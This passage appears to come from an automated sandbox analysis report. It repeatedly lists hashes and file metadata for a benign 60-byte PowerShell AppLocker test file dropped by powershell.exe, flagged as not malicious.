                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
